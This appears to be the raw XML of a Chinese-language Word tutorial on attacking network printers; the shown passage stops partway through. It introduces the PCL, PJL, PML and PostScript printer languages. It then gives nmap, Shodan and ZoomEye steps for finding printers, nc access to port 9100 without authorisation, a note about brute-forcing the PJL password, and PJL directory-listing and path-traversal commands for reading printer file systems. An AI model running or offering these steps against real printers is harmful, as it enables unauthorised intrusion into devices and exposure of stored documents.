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D90" w:rsidRPr="00036BCC" w:rsidRDefault="00036BCC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00036BCC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0x00:了解打印机语言</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036BCC" w:rsidRPr="00036BCC" w:rsidRDefault="00036BCC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00036BCC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>打印机控制语言（PCL）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036BCC" w:rsidRDefault="00036BCC">
      <w:r w:rsidRPr="00036BCC">
        <w:t>PCL（Printing Control Language）语言是将打印内容解释成标准页面描述文件，然后由打印机转换成光栅图像进行打印。采用PCL打印语言的打印机对计算机系统资源占用也较少，同时对字库、图像的解释能力较强，可以用来输出比较复杂的页面和图像，PCL语言具有较好的兼容性，可广泛支持所有操作系统；此外由于数据传输量较小，可以很方便地实现网络打印，适用于操作系统较复杂或大型的办公环境。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036BCC" w:rsidRDefault="00036BCC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00691AEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>打印机作业语言</w:t>
      </w:r>
      <w:r w:rsidR="00691AEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00691AEC">
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>PJL</w:t>
      </w:r>
      <w:r w:rsidR="00691AEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691AEC" w:rsidRDefault="00691AEC">
      <w:r w:rsidRPr="00691AEC">
        <w:t>PJL (Printer Job Language)作为PCL的扩展，用于指导打印机行为，比如更改设备设置、传输文件等，PJL最早由HP公司引入，现在已发展成为标准的打印任务控制语言。利用PJL语言可以对打印任务进行永久性的更改设置，PJL通过对文件格式和设置的读取之后，通过转换给打印机进行打印输出。</w:t>
      </w:r>
      <w:r w:rsidRPr="00691AEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下为典型的对打印纸张大小和数量进行设置的</w:t>
      </w:r>
      <w:r w:rsidRPr="00691AEC">
        <w:t>PJL命令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691AEC" w:rsidRPr="00691AEC" w:rsidRDefault="00691AEC" w:rsidP="00691AEC">
      <w:pPr>
        <w:ind w:leftChars="500" w:left="1050"/>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00691AEC">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve">1 @PJL SET PAPER=A4 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691AEC" w:rsidRPr="00691AEC" w:rsidRDefault="00691AEC" w:rsidP="00691AEC">
      <w:pPr>
        <w:ind w:leftChars="500" w:left="1050"/>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00691AEC">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve">2 @PJL SET COPIES=10 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691AEC" w:rsidRDefault="00691AEC" w:rsidP="00691AEC">
      <w:pPr>
        <w:ind w:leftChars="500" w:left="1050"/>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00691AEC">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>3 @PJL ENTER LANGUAGE=POSTSCRIPT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691AEC" w:rsidRDefault="00691AEC" w:rsidP="00691AEC">
      <w:r w:rsidRPr="00691AEC">
        <w:t>PJL可以被用来执行DoS攻击、打印页面控制、读取文件系统和内存，甚至恶意固件更新。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691AEC" w:rsidRDefault="00691AEC" w:rsidP="00691AEC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00691AEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>打印</w:t>
      </w:r>
      <w:r w:rsidR="00813C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>机</w:t>
      </w:r>
      <w:r w:rsidRPr="00691AEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>管理语言</w:t>
      </w:r>
      <w:r w:rsidR="00915F76">
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PML)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915F76" w:rsidRDefault="00915F76" w:rsidP="00915F76">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915F76">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>PML 是以对象为导向的应答型打印机管理语言，它包括 PML 命令和 PML 对象，每个 PML 对象都与唯一的打印机信息段相关联。 PML 命令可以指定访问对象的方法。PML语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>主要用</w:t>
      </w:r>
      <w:r w:rsidRPr="00915F76">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>来重置打印机出厂状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915F76" w:rsidRPr="00915F76" w:rsidRDefault="00915F76" w:rsidP="00915F76">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915F76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>页面描述语言（</w:t>
      </w:r>
      <w:r w:rsidRPr="00915F76">
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>PDL</w:t>
      </w:r>
      <w:r w:rsidRPr="00915F76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915F76" w:rsidRDefault="00915F76" w:rsidP="00691AEC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915F76">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>PDL（Page Descriptional Language），主要用于将位图格式转换成PCL格式代码，打印机接收后由CPU解释并执行打印。PDL的特点是多用途和表达精细，用来输出复杂的页面和图像。其工作流程都是首先在计算机端将打印内容解释成标准的页面描述文件然后传送到打印机控制器中，在打印控制器中再将页面描述文件解释成可以打印的光栅图像。Postscript（PS）和PCL（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Printing </w:t>
      </w:r>
      <w:r w:rsidRPr="00915F76">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Command Language）是两种标准化的页面描述语言。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915F76" w:rsidRDefault="00813C46" w:rsidP="00691AEC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2463394</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>34747</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="468172" cy="329184"/>
                <wp:effectExtent l="19050" t="19050" r="65405" b="52070"/>
                <wp:wrapNone/>
                <wp:docPr id="3" name="闪电形 3"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="468172" cy="329184"/>
                        </a:xfrm>
                        <a:prstGeom prst="lightningBol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D806B5"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闪电形 3" o:spid="_x0000_s1026" type="#_x0000_t73" style="position:absolute;left:0;text-align:left;margin-left:193.95pt;margin-top:2.75pt;width:36.85pt;height:25.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" fillcolor="#ffd966 [1943]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00915F76">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00915F76">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00915F76">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00915F76">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="00915F76">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915F76" w:rsidRPr="00915F76" w:rsidRDefault="00915F76" w:rsidP="00915F76">
      <w:pPr>
        <w:rPr>
          <w:color w:val="A5A5A5" w:themeColor="accent3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915F76">
        <w:rPr>
          <w:color w:val="A5A5A5" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>PostScript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00813C46" w:rsidRDefault="00915F76" w:rsidP="00915F76">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915F76">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>PostScript是一种与设备无关的打印机语言，即在定义图像时可以根本不考虑输出设备的特性（如打印机的分辨率、纸张大小等），而且它对文本和图形实行同样的处理过程，极具灵活性。在对纸张大小、进纸盒输出设备、分辨率等进行选择时，PostScript</w:t>
      </w:r>
      <w:r w:rsidR="00813C46">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>可以实现不同特性的良好描述。</w:t>
      </w:r>
      <w:r w:rsidR="00813C46" w:rsidRPr="00813C46">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>PS在处理打印大的文件，如PDF、Photoshop等软件下打印大的图形图像文件有速度优势，准确度、色彩方面比PCL强。PS适用于对图形和色彩准确度要求比较高的专业应用。</w:t>
      </w:r>
      <w:r w:rsidRPr="00915F76">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>PostScript可以被用来执行DoS攻击、打印页面控制、读取文件系统和内存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00813C46" w:rsidRDefault="00813C46" w:rsidP="00915F76">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00813C46" w:rsidRPr="00813C46" w:rsidRDefault="00813C46" w:rsidP="00813C46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="A5A5A5" w:themeColor="accent3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813C46">
        <w:rPr>
          <w:color w:val="A5A5A5" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>打印机指令语言</w:t>
      </w:r>
      <w:r w:rsidRPr="00813C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="A5A5A5" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00813C46">
        <w:rPr>
          <w:color w:val="A5A5A5" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>Printer Command Language</w:t>
      </w:r>
      <w:r w:rsidRPr="00813C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="A5A5A5" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915F76" w:rsidRDefault="00813C46" w:rsidP="00813C46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>与打印机控制语言（</w:t>
      </w:r>
      <w:r w:rsidRPr="00813C46">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Printing Control Language）不同的是，打印机指令语言是PDL的一种， PCL 实质上是一种面向文本的语言，已扩展到能提供图形功能，但在大型打印文件处理、色彩表现准确度等方面不如PostScript有优势，所以PCL语言更适用于普通的商务办公应用。打印机指令语言PCL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>很难被攻击利用，所以，</w:t>
      </w:r>
      <w:r w:rsidRPr="00813C46">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>它仅被用来在打印内存中构造虚拟宏文件。</w:t>
      </w:r>
      <w:r w:rsidR="00915F76">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00915F76">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5C10" w:rsidRDefault="00BD5C10" w:rsidP="00813C46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD5C10" w:rsidRDefault="00BD5C10" w:rsidP="00813C46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD5C10" w:rsidRDefault="00BD5C10" w:rsidP="00813C46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5C10">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0x01:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5C10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>发现网络中的打印机</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5C10" w:rsidRDefault="00BD5C10" w:rsidP="00813C46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5C10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5C10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5C10">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5C10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve">p </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5C10">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>9100 192.168.101.1/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5C10" w:rsidRPr="00BD5C10" w:rsidRDefault="00BD5C10" w:rsidP="00813C46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BC5FE63" wp14:editId="27C5FB48">
            <wp:extent cx="2245767" cy="1840118"/>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66456" cy="1857070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5C10" w:rsidRDefault="00BD5C10" w:rsidP="00813C46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Shodan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Key:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5C10">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> device:printer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5C10" w:rsidRDefault="00BD5C10" w:rsidP="00813C46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5C10">
        <w:t>3.ZoomEye K</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5C10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ey</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5C10">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5C10">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>service:”jetdirect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5C10" w:rsidRDefault="00BD5C10" w:rsidP="00813C46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5C10">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0x02:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5C10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>通过9100端口未授权访问打印机</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00813C46">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 192.168.101.227 9100</w:t>
      </w:r>
      <w:r w:rsidR="00911ED2">
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidR="00911ED2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；如果不能直接访问还需爆破PJL密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRPr="00BD5C10" w:rsidRDefault="00DB1AF1" w:rsidP="00813C46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用的PJL指令：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1AF1">
        <w:t xml:space="preserve">@PJL INFO ID      </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1AF1">
        <w:t>获取打印机设备名称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5C10" w:rsidRDefault="00DB1AF1" w:rsidP="00813C46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB1AF1">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4008755" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="C:\Users\sheepherder\Desktop\通过9100端口利用pjl语言\获取打印机设备信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eepherder\Desktop\通过9100端口利用pjl语言\获取打印机设备信息.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8755" cy="914400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00813C46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRPr="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r w:rsidRPr="00DB1AF1">
        <w:t>@PJL FSDIRLIST NAME="0:/" ENTRY=1 COUNT=1024</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r w:rsidRPr="00DB1AF1">
        <w:t>@PJL FSDIRLIST NAME="0:/" ENTR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；遍历当前目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRPr="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1AF1">
        <w:t>0:/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为打印机当前目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00813C46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB1AF1">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2298116" cy="2970539"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1270"/>
            <wp:docPr id="6" name="图片 6" descr="C:\Users\sheepherder\Desktop\通过9100端口利用pjl语言\目录遍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eepherder\Desktop\通过9100端口利用pjl语言\目录遍历.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3088" cy="3015743"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRPr="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r w:rsidRPr="00DB1AF1">
        <w:lastRenderedPageBreak/>
        <w:t>@PJL FSDIRLIST NAME="0:/../../" ENTRY=1 COUNT=1024</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r w:rsidRPr="00DB1AF1">
        <w:t>@PJL FSDIRLIST NAME="0:/../../"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1AF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1AF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>级目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r w:rsidRPr="00DB1AF1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4747260" cy="1097280"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="7" name="图片 7" descr="C:\Users\sheepherder\Desktop\通过9100端口利用pjl语言\目录遍历读取上上级目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eepherder\Desktop\通过9100端口利用pjl语言\目录遍历读取上上级目录.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7260" cy="1097280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
